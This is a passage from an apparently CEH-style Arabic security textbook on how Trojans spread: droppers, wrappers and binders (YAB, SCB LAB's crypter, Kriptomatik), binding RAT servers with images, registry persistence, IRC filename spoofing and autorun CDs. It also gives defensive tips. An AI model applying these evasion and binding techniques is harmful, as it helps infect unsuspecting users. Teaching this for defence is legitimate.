‫ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻓﺈن اﻟﻔﯾروس ﯾﻧﺗﺷر ﺗﻠﻘﺎﺋﯾﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ ‬ﯾﻣﻛن ﻧﺷر اﻟﻔﯾروﺳﺎت ﺣﺗﻰ ﻣن ﺧﻼل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬دردﺷﺎت اﻹﻧﺗرﻧت‪ ،‬ﺷﺑﻛﺎت اﻟﺗﺑﺎدل وﻣﺷﺎرﻛﺔ‬
‫اﻟﻣﻠﻔﺎت ‪ ،network redirecting ،P2P‬أو ‪.hijacking‬‬

‫‪499‬‬
‫اﻟﺧطوة ‪ :5‬ﺗﺷﻐﯾل ‪ .Dropper‬ﯾﺳﺗﺧدم ‪ Dropper‬ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻹﺧﻔﺎء اﻟﺑراﻣﺞ اﻟﺿﺎرة ﺑﮭﺎ‪ .‬اﻟﻣﺳﺗﺧدم ﯾﻛون ﻣﺷوش وﯾﻌﺗﻘد‬
‫أن ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت ھﻲ ﻣﻠﻔﺎت ﺣﻘﯾﻘﯾﺔ أو ﻣﻌروﻓﺔ‪ .‬ﺑﻣﺟرد ان ﯾﺗم ﺗﺣﻣﯾﻠﮫ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف‪ ،‬ﻓﺈﻧﮫ ﯾﺳﺎﻋد ﻏﯾره ﻣن اﻟﺑراﻣﺞ‬
‫اﻟﺿﺎرة ان ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ وﺗﻧﻔﯾذ ﻣﮭﻣﺗﮭﺎ‪.‬‬
‫اﻟﺧطوة ‪ :6‬ﺗﻧﻔﯾذ اﻟﺿرر اﻟروﺗﯾﻧﻲ)‪ . (damage routine‬ﻣﻌظم ﻓﯾروﺳﺎت اﻟﻛﻣﺑﯾوﺗر ﺗﺣﺗوي ﻋﻠﻰ اﻟﺿرر اﻟروﺗﯾﻧﻲ اﻟذي ﯾﺳﻠم‬
‫‪ Payload .payload‬أﺣﯾﺎﻧﺎ ﯾﻌرض ﺳوى ﺑﻌض اﻟﺻور أو اﻟرﺳﺎﺋل ﺣﯾن ‪ payloads‬اﻷﺧرى ﯾﻣﻛن ﺣﺗﻰ ﺣذف اﻟﻣﻠﻔﺎت‪ ،‬إﻋﺎدة‬
‫ﺗﮭﯾﺋﺔ اﻷﻗراص اﻟﺻﻠﺑﺔ )‪ ، (reformatted‬أو اﻟﺗﺳﺑب ﻓﻲ أﺿرار أﺧرى‪.‬‬
‫‪Wrappers‬‬
‫اﻟﻣﺻدر‪http://www.objs.com :‬‬
‫‪ Wrappers‬ﯾﺳﺗﺧدم ﻟرﺑط ﻣﻠف ﺗروﺟﺎن اﻟﻘﺎﺑل ﻟﻠﺗﻧﻔﯾذ ﻣﻊ ﺗطﺑﯾﻖ ‪exe‬طﺑﯾﻌﻲ اﻟﻣظﮭر ﻣﺛل اﻷﻟﻌﺎب أو اﻟﺗطﺑﯾﻘﺎت اﻟﻣﻛﺗﺑﯾﺔ‪ .‬ﻋﻧد ﺗﺷﻐﯾل‬
‫اﻟﻣﺳﺗﺧدم ‪ ،wrapped EXE‬ﻓﺎﻧﮫ ﯾﺗم أوﻻ ﺗﺛﺑﯾت طروادة ﻓﻲ اﻟﺧﻠﻔﯾﺔ )أي ﻻ ﯾدرك اﻟﻣﺳﺗﺧدم ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت اﻟﻘﺎﺋﻣﺔ ﻟﻠﺗروﺟﺎن( ﺛم ﯾﻘوم‬
‫ﺑﺗﺷﻐﯾل اﻟﺗطﺑﯾﻖ اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮫ )‪ (wrapped application‬ﻓﻲ اﻟﻣﻘدﻣﺔ )أي ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ظﺎھره ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم(‪ .‬اﻟﻣﮭﺎﺟم ﯾﻣﻛﻧﮫ أن‬
‫ﯾﻘوم ﺑﺿﻐط أي ﻣن اﻛواد ‪ (DOS/WIN) binary‬ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل ‪ .petite.exe‬ھذه اﻷداة ﯾﻣﻛﻧﮭﺎ ﻓك اﻟﺿﻐط ﻟﻣﻠف ﻋﻧد وﻗت‬
‫اﻟﺗﺷﻐﯾل‪ .‬وھذا ﯾﺟﻌل ﻣن اﻟﻣﻣﻛن ﻟﻠطروادة أﻻ ﯾﺗم اﻟﻛﺷف ﻋﻧﮫ‪ ،‬ﻷن ﻣﻌظم ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻏﯾر ﻗﺎدرة ﻋﻠﻰ اﻟﻛﺷف ﻋن اﻟﺗوﻗﯾﻌﺎت‬
‫ﻓﻲ اﻟﻣﻠف‪.‬‬
‫اﻟﻣﮭﺎﺟم ﯾﻣﻛﻧﮫ أن ﯾﺿﻊ اﻟﻌدﯾد ﻣن اﻟﻣﻠﻔﺎت اﻟﺗﻧﻔﯾذﯾﺔ داﺧل ﻣﻠف ﺗﻧﻔﯾذي واﺣد‪ ،‬ﻛذﻟك ‪ Wrappers‬ﻣن اﻟﻣﻣﻛن ان ﯾدﻋم ﺑﻌض اﻟوظﺎﺋف ﻣﺛل‬
‫ﺗﺷﻐﯾل ﻣﻠف واﺣد ﻓﻲ اﻟﺧﻠﻔﯾﺔ ﺑﯾﻧﻣﺎ اﻟﻣﻠف اﻻﺧر ﯾﻌﻣل ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب‪.‬‬
‫ﻣن اﻟﻧﺎﺣﯾﺔ اﻟﻔﻧﯾﺔ‪ Wrappers ،‬ﯾﻣﻛن اﻋﺗﺑﺎره ﻧوع آﺧر ﻣن اﻟﺑرﻣﺟﯾﺎت "‪ "glueware‬ﯾﺳﺗﺧدم ﻟرﺑط ﻣﻛوﻧﺎت اﻟﺑراﻣﺞ اﻷﺧرى ﻣﻌﺎ‪.‬‬
‫‪ Wrapper‬ﯾﺗم ﺗﻐﻠﯾﻔﮫ إﻟﻰ ﻣﺻدر ﺑﯾﺎﻧﺎت واﺣد ﻟﺟﻌﻠﮭﺎ ﻗﺎﺑﻠﺔ ﻟﻼﺳﺗﺧدام ﺑطرﯾﻘﺔ أﻛﺛر ﻣﻼءﻣﺔ ﻣن ﻣﺻدر ‪ unwrapped‬اﻷﺻﻠﻲ‪.‬‬
‫ﯾﻣﻛن ﺧداع اﻟﻣﺳﺗﺧدﻣﯾن ﻟﯾﻘوﻣوا ﺑﺗﺛﺑﯾت أﺣﺻﻧﺔ طروادة ﻋن طرﯾﻖ إﻏراﺋﮫ أو إﺧﺎﻓﺗﮫ‪ .‬ﻋﻠﻰ ﺳﺑﯾل‬
‫اﻟﻣﺛﺎل‪ ،‬ﻗد ﯾوﺿﻊ ﺣﺻﺎن طروادة ﻓﻲ رﺳﺎﻟﺔ ﺑﺎﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ﯾﺗم وﺻﻔﮭﺎ ﻋﻠﻰ أﻧﮭﺎ ﻟﻌﺑﺔ ﻛﻣﺑﯾوﺗر‪.‬‬
‫ﻋﻧدﻣﺎ ﯾﺗﻠﻘﻰ اﻟﻣﺳﺗﺧدم اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬ﻓﺎن وﺻف اﻟﻠﻌﺑﺔ ﻗد ﯾﻐرﯾﮫ ﻟﺗﺛﺑﯾﺗﮫ‪ .‬وﻋﻠﻰ ﻣﺎ ﯾﺑدو أﻧﮭﺎ ﻗد‬
‫ﺗﻛون ﻓﻲ اﻟواﻗﻊ‪ ،‬ﻟﻌﺑﺔ‪ ،‬وﻟﻛﻧﮭﺎ ﻓﻲ اﻟﺣﻘﯾﻘﺔ ﺗﺗﺧذ ﺑﻌض اﻻﺟراءات اﻷﺧرى اﻟﺗﻲ ھﻲ ﻟﯾﺳت واﺿﺣﺔ‬
‫ﺑﺳﮭوﻟﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم‪ ،‬ﻣﺛل ﺣذف اﻟﻣﻠﻔﺎت أو إرﺳﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ إﻟﻰ اﻟﻣﮭﺎﺟم ﻋﺑر اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ‪ .‬ﻓﻲ ﺣﺎﻟﺔ أﺧرى‪ ،‬اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺎرﺳﺎل ﻛﺎرت ﺗﺣﯾﺔ ﻋﯾد اﻟﻣﯾﻼد واﻟذي ﯾﻘوم ﺑﺗﺛﺑﯾت ﺣﺻﺎن‬
‫طروادة ﻓﻲ اﻟوﻗت اﻟذي ﯾﺷﺎھد ﻓﯾﮫ اﻟﻣﺳﺗﺧدم ھذا اﻟﻛﺎرت‪ ،‬ﻣﺛل ﻛﻌﻛﺔ ﻋﯾد ﻣﯾﻼد اﻟﺗﻲ ﺗرﻗص ﻋﺑر‬
‫اﻟﺷﺎﺷﺔ‪.‬‬
‫‪Wrapper Covert Programs‬‬

‫‪Kriptomatik‬‬
‫‪ Kriptomatik‬ھو ﺑرﻧﺎﻣﺞ ‪ Wrapper Covert‬اﻟذي ﺗم ﺗﺻﻣﯾﻣﮫ ﻟﺗﺷﻔﯾر وﺣﻣﺎﯾﺔ اﻟﻣﻠﻔﺎت ﺿد ‪ crackers‬وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪.‬‬
‫ﯾﻧﺷر ﻋن طرﯾﻖ اﻟﺑﻠوﺗوث‪ ،‬وﯾﺳﻣﺢ ﻟك ﺑﺣرق ‪ CD/DVD‬ﻣﻊ ﻣﯾزة اﻟﺗﺷﻐﯾل اﻟﺗﻠﻘﺎﺋﻲ)‪.(Autorun‬‬

‫‪500‬‬
‫ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﯾزات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -‬ﺗﻌدﯾل اﻻﯾﻘوﻧﺎت )‪(Configure icons‬‬
‫‪ -‬ﺟﻣﻊ اﻟﻣﻠﻔﺎت )‪(Gather files‬‬
‫‪ -‬اﻟﻣﺷﺎرﻛﺎت )‪(Posts‬‬
‫‪ -‬اﻟﻧﺷر )‪(Propagation‬‬
‫‪ -‬ﻣﯾزات أﺧرى ﻣﺛل اﻟﺗﺷﻐﯾل اﻟﺗﻠﻘﺎﺋﻲ‪ ،attributes ،‬واﻟﺗﺷﻔﯾر‪ ،‬اﻟﺦ‪.‬‬
‫‪Advanced File Joiner‬‬
‫‪ Advanced File Joiner‬ھو ﺑرﻧﺎﻣﺞ ﯾﺳﺗﺧدم ﻟﺟﻣﻊ وﺿم ﻣﺧﺗﻠف اﻟﻣﻠﻔﺎت ﻓﻲ ﻣﻠف واﺣد‪ .‬إذا ﻗﻣت ﺑﺗﺣﻣﯾل أﺟزاء ﻣﺗﻌددة ﻣن اﻧﻘﺳﺎم‬
‫ﻣﻠﻔﺎت ﻛﺑﯾرة اﻟﻰ ﻣﻠﻔﺎت أﺻﻐر‪ ،‬ﯾﻣﻛﻧك ﺿم ھذه اﻟﻣﻠﻔﺎت ﺑﺳﮭوﻟﺔ ﻣﻊ ھذه اﻷداة‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﯾﻣﻛﻧك اﻟﺟﻣﻊ ﺑﯾن اﻟﻣﻠﻔﺎت اﻟﻧﺻﯾﺔ ‪ASCII‬‬
‫أو اﻟﺟﻣﻊ ﺑﯾن ﻣﻠﻔﺎت اﻟﻔﯾدﯾو ﻣﺛل ﻣﻠﻔﺎت ‪ MPEG‬ﻓﻲ ﻣﻠف واﺣد إذا ﻛﺎﻧوا ﻓﻘط ﻣن ﻧﻔس اﻟﺣﺟم‪ ،‬واﻟﻧوع )اﻻﻣﺗداد(‪ ،‬واﻟﺗرﻣﯾز‪ .‬ھذه اﻷداة ﻻ‬
‫ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﺑﺷﻛل ﻓﻌﺎل ﻟﺿم ﻧوع ﻣﻠف ﯾﺣﺗوي ﻋﻠﻰ ‪ head information‬ﻣﺛل ‪ ،JPEG ،BMP ،AVI‬وﻣﻠﻔﺎت ‪ .DOC‬ﻟذﻟك‪ ،‬ﻟﻛل‬
‫ﻣن ھذه اﻷﻧواع ﻣن ﺗﻧﺳﯾﻘﺎت اﻟﻣﻠﻔﺎت‪ ،‬ﯾﺟب اﺳﺗﺧدام ﺑراﻣﺞ ﻣﻌﯾﻧﺔ ﻟﺿم اﻟﺑراﻣﺞ‪.‬‬

‫‪501‬‬
‫‪SCB LAB’s - Professional Malware Tool‬‬
‫ﺗم ﺗﺻﻣﯾم ھذه اﻷداة ﻟﻸﻏراض اﻷﺗﯾﺔ‪:‬‬

‫‪ -1‬اﻟﺗﺷﻔﯾر )‪ (Crypter‬ﺑﺎﺳﺗﺧدام اﻟﺗﻘﻧﯾﺎت اﻷﺗﯾﺔ ﻓﻲ اﻟﺗﺷﻔﯾر‬
‫‪Anti-Virtual Machine‬‬
‫‪XOR Encryption, CryptAPI, TEA, DES, Blowfish, Base64, RC4, Ghost, Huffman, Skipjack, ThowFish‬‬
‫‪ -2‬اﻟﺗﺟﻣﯾﻊ )‪ (Binder‬ﻟﻌدد ﻏﯾر ﻣﺣدود ﻣن اﻟﻣﻠﻔﺎت‪.‬‬
‫‪ -3‬ﺗﺣﻣﯾل )‪ (Downloader‬ﻟﻌدد ﻏﯾر ﻣﺣدود ﻣن اﻟﻣﻠﻔﺎت‪.‬‬
‫‪ -4‬اﻟﻧﺷر )‪ (Spreader‬ﻟﻌدد ﻏﯾر ﻣﺣدود ﻣن اﻟﻣﻠﻔﺎت‪.‬‬
‫‪OneFileExeMaker‬‬
‫)‪Yet Another Builder (YAB‬‬

‫اﻟﻣﺻدر‪http://yab.sourceforge.net :‬‬
‫ﺑرﻧﺎﻣﺞ ‪YAB‬ﻣن أﻓﺿل ﺑراﻣﺞ اﻟدﻣﺞ واﻟﺗﺷﻔﯾر وﺗﻐﯾﯾر اﻻﻣﺗداد‪ .‬ﺑرﻧﺎﻣﺞ ﺻﻐﯾر اﻟﺣﺟم وﻣﺗﻣﯾز وﻋﻠﻰ اﻟرﻏم ﻣن اﻧﮫ ﻗدﯾم‪ ،‬وﻟﻛن أﺛﺑت ﻗوﺗﮫ‬
‫وﻓﻌﺎﻟﯾﺗﮫ وﺷﮭرﺗﮫ‪.‬‬

‫‪502‬‬
‫اﻟﻣﻣﯾزات ﻣن أھﻣﮭﺎ ‪:‬‬

‫‪ -1‬ﯾﻣﻛﻧﮫ دﻣﺞ أي ﻋدد ﻣن اﻟﺣزم ﻓﻌﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﯾﻣﻛﻧك دﻣﺞ ﺳﯾرﻓر ‪ optix‬وﺳﯾرﻓر ‪ Pro Rat‬وأي ﺳﯾرﻓر آﺧر ﻣﻊ ﺻورة ﻣﺛﻼ‪.‬‬
‫‪ -2‬ﯾﻣﻛن أن ﯾﻧﻔذ أﻣر ﺑﻣﺳﺢ ﻣﻠف أو ﻣﺟﻠد‬
‫‪ -3‬ﯾﻣﻛن أن ﯾﻧﺷط اﻟﺳﯾرﻓر اﻟﻣدﻣوج ﻓﻲ اﻟرﺟﯾﺳﺗري ﻟﻛﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻓﻲ ﻛل ﻣرة ﻋﻧد ﺑداﯾﺔ ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -4‬ﯾﻣﻛﻧﮫ أن ﯾﻐﯾر أﯾﻘوﻧﺔ اﻟﺳﯾرﻓر اﻟﻣدﻣوج‪.‬‬
‫اﺧﺗر ﻣن ‪ select command to add‬اﻻﻣر اﻟذي ﺳﯾﻧﻔذه اﻟﺗروﺟﺎن ﻋﻧد ﺗﺷﻐﯾﻠﮫ ﻣﺛل اﻻﺗﻲ‪:‬‬
‫‪ Bind File -‬و ذﻟك ﻟﻔﺗﺢ ﻣﻠف اﺧر ﻣﻊ اﻟﺗروﺟﺎن ﻣن ﺟﮭﺎزك او ﺟﮭﺎز اﻟﺿﺣﯾﺔ‬
‫‪ Delete file or folder -‬ﻟﺣذف اﻟﻣﻠف او اﻟﻣﺟﻠد ﻋﻧد ﻓﺗﺣﺔ‬
‫‪ Execute file -‬أﺧﻔﺎء اﻟﺗروﺟﺎن ﻓﻲ أي ﻣﺟﻠد ﻣن ﻣﺟﻠدات اﻟﻧظﺎم ﻓﻲ اﻟوﯾﻧدوز ﺗﺧﺗﺎرھﺎ اﻧت ﺑﻧﻔﺳك ﻣﺛل ‪Root folder, temp‬‬
‫‪folder, system folder‬وﻏﯾرة‪.‬‬
‫‪ Message Box -‬ﻻ ظﮭﺎر رﺳﺎﻟﺔ ‪ Error‬ﻋﻧد اﻟﺗﺷﻐﯾل‬
‫اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﻣﻛن ان ﯾﺣﺻل اﻟﺗروﺟﺎن اﻟوﺻول اﻟﻰ اﻟﻧظﺎم )‪(Different Ways a Trojan Can Get Into a System‬‬
‫ﻧﻘﺎط اﻟوﺻول اﻟﻣﺧﺗﻠﻔﺔ ﺗﺳﺗﺧدم ﻋن طرﯾﻖ ﺣﺻﺎن طروادة ﻟﺗﺻﯾب ﻧظﺎم اﻟﺿﺣﯾﺔ‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه اﻟﻧﻘﺎط‪ ،‬ﻓﺎن اﻟﺗروﺟﺎن ﯾﮭﺎﺟم اﻟﻧظﺎم‬
‫اﻟﮭدف وﯾﺄﺧذ اﻟﺳﯾطرة ﻛﺎﻣﻠﺔ ﻋﻠﻰ اﻟﻧظﺎم‪ .‬وھم ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫‪503‬‬
‫ﺗﻄﺒﯿﻘﺎت اﻟﻤﺤﺎدﺛﺎت )‪(Instant Messenger Application‬‬
‫اﻟﻧظﺎم ﯾﻣﻛن أن ﯾﺻﺎب ﻋن طرﯾﻖ ﺗطﺑﯾﻘﺎت اﻟﻣﺣﺎدﺛﺎت ﻣﺛل ‪ ICQ‬أو ‪ .Yahoo messenger‬ﺣﯾث ﯾﻛون اﻟﻣﺳﺗﺧدم ﻓﻲ ﺧطر ﻛﺑﯾر ﺣﯾن‬
‫ﺗﻠﻘﻲ اﻟﻣﻠﻔﺎت ﻋن طرﯾﻖ ‪ ،messenger‬ﺑﻐض اﻟﻧظر ﻋﻣن أرﺳل أو ﻣن أﯾن‪ .‬ﺣﯾث أﻧﮫ ﻻ ﯾوﺟد أي ﻣن ﺗطﺑﯾﻘﺎت اﻟﻔﺣص اﻟﻣدﻣﺟﺔ ﻣﻊ ﺗطﺑﯾﻘﺎت‬
‫‪ ،messenger‬ﺣﯾث أن ھﻧﺎك داﺋﻣﺎ ﺧطر ﻣن اﻟﻌدوى ﻋن طرﯾﻖ اﻟﺗروﺟﺎن‪ .‬اﻟﻣﺳﺗﺧدم ﻻ ﯾﻣﻛﻧﮫ أﺑدا أن ﯾﻛون ﻣﺗﺄﻛدا ‪ ٪100‬ﻣن ھو ﻋﻠﻰ‬
‫اﻟﺟﺎﻧب اﻵﺧر ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻓﻲ ﻟﺣظﺔ ﻣﻌﯾﻧﺔ‪ .‬ﺣﯾث اﻧﮫ ﻣن اﻟﻣﻣﻛن أن ﯾﻛون ﺷﺧص ﻣﺎ ﻗد اﺧﺗرق ھوﯾﺔ ‪ messenger ID‬وﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ ،‬وﯾرﯾد أن ﯾﻧﺷر اﻟﺗروﺟﺎن ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ اﻷﺻدﻗﺎء‪.‬‬
‫)‪IRC (Internet Relay Chat‬‬
‫‪ IRC‬ھﻲ طرﯾﻘﺔ أﺧرى ﺗﺳﺗﺧدم ﻟﻧﺷر طروادة‪ Trojan.exe .‬ﯾﻣﻛن أن ﯾﻌﺎد ﺗﺳﻣﯾﺔ اﻟﻰ ﺷﻲء ﻣن ھذا اﻟﻘﺑﯾل ‪Trojan.txt‬‬
‫‪ .(With 150 spaces).exe‬ﻓﺈﻧﮫ ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮫ ﻣن ﺧﻼل ‪ ،IRC‬وﻓﻲ )‪ ،DCC (Direct Client to Client‬وﺳوف ﺗظﮭر‬
‫ﻋﻠﻰ ھﯾﺋﺔ )‪ .(.TXT‬ﺗﻧﻔﯾذ ﻣﺛل ھذه اﻟﻣﻠﻔﺎت ﺳوف ﯾﺳﺑب اﻟﻌدوى‪ .‬ﻣﻌظم اﻟﻧﺎس ﻻ ﯾﻼﺣظون أن ﺗطﺑﯾﻖ )‪ (.exe‬ﯾﺣﺗوي ﻋﻠﻰ أﯾﻘوﻧﺔ ﻣﻠف‬
‫ﻧﺻﻲ‪ .‬ﻟذﻟك ﻗﺑل ﺗﺷﻐﯾل ﻣﺛل ھذه اﻷﻣور‪ ،‬ﺣﺗﻰ ﻟو ﻛﺎن ھو ﻣﻊ أﯾﻘوﻧﺔ ﻣﻠف ﻧﺻﻲ؛ ﯾﺟب ﻓﺣص اﻻﻣﺗدادات ﻟﻠﺗﺄﻛد ﻣن أﻧﮭﺎ ﺣﻘﺎ ﻣﻠف ﻧﺻﻲ‪.‬‬
‫‪ -‬ﻻ ﺗﻘم ﺑﺗﺣﻣﯾل أي ﻣن اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗﺑدو أﻓﻼم اﺑﺎﺣﯾﺔ أو ﺑراﻣﺞ إﻧﺗرﻧت ﻣﺟﺎﻧﯾﺔ‪ .‬ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺑﺗدﺋﯾن ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﻛون أھداف‬
‫ﺳﮭﻠﮫ ﻟﻣﺛل ھذه اﻟﻌروض اﻟﻛﺎذﺑﺔ‪ ،‬وﻛﺛﯾر ﻣن اﻟﻧﺎس ﻋﻠﻰ ‪ IRC‬ﻻ ﯾدرﻛون ﻧظﺎم اﻷﻣن‪ .‬اﻟﻣﺳﺗﺧدﻣﯾن ﯾﺻﺑﺣوا ﻣﺻﺎﺑﯾن ﻧﺗﯾﺟﺔ اﻟﻘﻧوات‬
‫اﻻﺑﺎﺣﯾﺔ اﻟﺗﺟﺎرﯾﺔ‪ ،‬ﻷﻧﮭم ﻻ ﯾﻔﻛروا ﻓﻲ اﻟﻣﺧﺎطر اﻟﺗﻲ ﺗﻧطوي ﻋﻠﻰ ﻛﯾﻔﯾﺔ اﻟﺣﺻول ﻋﻠﻰ اﻷﻓﻼم اﻻﺑﺎﺣﯾﺔ واﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ‪.‬‬
‫‪Physical Access‬‬
‫ﺗﻘﯾﯾد اﻟوﺻول اﻟﻣﺎدي ﻟﻠﻛﻣﺑﯾوﺗر ﯾﻌﺗﺑر ﻣﮭم ﺟدا ﺑﺎﻟﻧﺳﺑﺔ ﻟﻸﻣن اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫أﻣﺛﻠﮫ‪:‬‬
‫‪ -‬ﺻدﯾﻖ اﻟﻣﺳﺗﺧدم ﯾرﯾد اﻟوﺻول اﻟﻣﺎدي إﻟﻰ ﻧظﺎﻣﮫ‪ .‬اﻟﻣﺳﺗﺧدم ﻗد ﯾﺗﺳﻠل اﻟﻰ ﻏرﻓﺔ ﺣﺎﺳوب ﺻدﯾﻘﮫ ﻓﻲ ﻏﯾﺎﺑﮫ وﺗﺛﺑﯾت ﺣﺻﺎن طروادة‬
‫ﻋن طرﯾﻖ ﻧﺳﺦ ﺑرﻣﺟﯾﺎت طروادة ﻣن ﻗرص ﻟﮫ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪.‬‬
‫‪ -‬اﻟﺑدء اﻟﺗﻠﻘﺎﺋﻲ ]‪ [Autostart‬ھﻲ طرﯾﻘﺔ أﺧرى ﺗﺻﯾب اﻟﻧظﺎم ﻋﻧدﻣﺎ ﯾﻣﻠك اﻟوﺻول اﻟﻣﺎدي‪ .‬ﻋﻧدﻣﺎ ﯾﺗم وﺿﻊ ﻗرص ﻣﺿﻐوط ﻓﻲ‬
‫ﻋﻠﺑﺔ ‪ ،CD-ROM‬ﻓﺎﻧﮫ ﯾﺑدأ ﺗﻠﻘﺎﺋﯾﺎ ﻣﻊ واﺟﮭﺔ اﻹﻋداد‪ .‬ﻣﺛﺎل ﻋﻠﻰ ﻣﻠف ‪ Autorun.inf‬اﻟﺗﻲ ﯾﺗم وﺿﻌﮭﺎ ﻋﻠﻰ ﻣﺛل ھذه ‪:CD‬‬
‫]‪[autorun‬‬
‫‪open=setup.exe‬‬
‫‪icon=setup.exe‬‬
‫‪ -‬ﯾﻣﻛن ﺗﺷﻐﯾل طروادة ﺑﺳﮭوﻟﺔ ﻋن طرﯾﻖ ﺗﺷﻐﯾل ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ اﻟﺣﻘﯾﻘﻲ‪.‬‬
‫‪ -‬ﻷن اﻟﻛﺛﯾر ﻣن اﻟﻧﺎس ﻻ ﯾﻌرﻓون ﻋن ‪ ،CD function‬ﻓﺎن اﺟﮭزﺗﮭم ﻗد ﺗﺻﺎب‪ ،‬وﻟن ﯾﻔﮭﻣوا ﻣﺎ ﺣدث أو ﻛﯾف ﺗم اﻟﻘﯾﺎم ﺑﮫ‪.‬‬
‫‪ -‬ﯾﻧﺑﻐﻲ أن ﯾﺗم إطﻔﺎء وظﯾﻔﺔ اﻟﺗﺷﻐﯾل اﻟﺗﻠﻘﺎﺋﻲ ﻋن طرﯾﻖ اﻟﻘﯾﺎم ﺑﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪Start  Settings  Control Panel  System  Device Manager  CDROM Properties  Settings‬‬
‫‪Browser and Email Software Bugs‬‬
‫ﻋﺎدة ﻻ ﯾﻘوم اﻟﻣﺳﺗﺧدﻣﯾن ﺑﺗﺣدﯾث اﻟﺑراﻣﺞ اﻟﺧﺎﺻﺔ ﺑﮭم ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻛﻣﺎ ﯾﺟب‪ ،‬واﻟﻌدﯾد ﻣن اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﻔﺎدون ﻣن ھذه اﻟﺣﻘﯾﻘﺔ‬
‫اﻟﻣﻌروﻓﺔ ﺟﯾدا‪ .‬ﺗﺧﯾل ان اﺻدار ﻗدﯾم ﻣن إﻧﺗرﻧت إﻛﺳﺑﻠورر ﯾﺳﺗﺧدم‪ .‬زﯾﺎرة إﻟﻰ ﻣوﻗﻊ ﺧﺑﯾث ﻗد ﯾﺻﯾب اﻟﺟﮭﺎز ﺗﻠﻘﺎﺋﯾﺎ دون ﺗﺣﻣﯾل أو ﺗﻧﻔﯾذ أي‬
‫ﺑراﻣﺞ‪ .‬ﯾﺣدث ﻧﻔس اﻟﺳﯾﻧﺎرﯾو ﻋﻧد اﻟﺗﺣﻘﻖ ﻣن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﻊ ‪ Outlook Express‬أو ﺑﻌض اﻟﺑراﻣﺞ اﻷﺧرى ﻣﻊ اﻟﻣﺷﺎﻛل اﻟﻣﻌروﻓﺔ‪.‬‬
‫ﻣرة أﺧرى‪ ،‬ﻧظﺎم اﻟﻣﺳﺗﺧدم ﺳوف ﯾﻛون ﻣﺻﺎﺑﺎ ﺣﺗﻰ ﻣن دون ﺗﺣﻣﯾل اﻟﻣرﻓﻘﺎت‪ .‬أﺣدث ﻧﺳﺧﺔ ﻣن اﻟﻣﺗﺻﻔﺢ وﺑرﻧﺎﻣﺞ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﯾﻧﺑﻐﻲ‬
‫أن ﺗﺳﺗﺧدم‪ ،‬ﻷﻧﮫ ﯾﻘﻠل ﻣن ﺧطر ھذه اﻻﺻدارات‪.‬‬
‫ﺗﺣﻘﻖ ﻣن اﻟﻣواﻗﻊ اﻟﺗﺎﻟﯾﺔ ﻟﻔﮭم ﻣدى ﺧطورة ھذه اﻠ ‪ ،BUGS‬ﻛل ذﻟك ﺑﺳﺑب اﺳﺗﺧدام اﻹﺻدار اﻟﻘدﯾم ﻣن اﻟﺗطﺑﯾﻘﺎت‪:‬‬
‫‪http://www.guninski.com/browsers.html‬‬
‫‪http://www.guninski.com/netscape.html‬‬

‫‪504‬‬
‫اﻟﺒﺮاﻣﺞ اﻟﻤﺰﯾﻔﺔ )‪(Fake Program‬‬
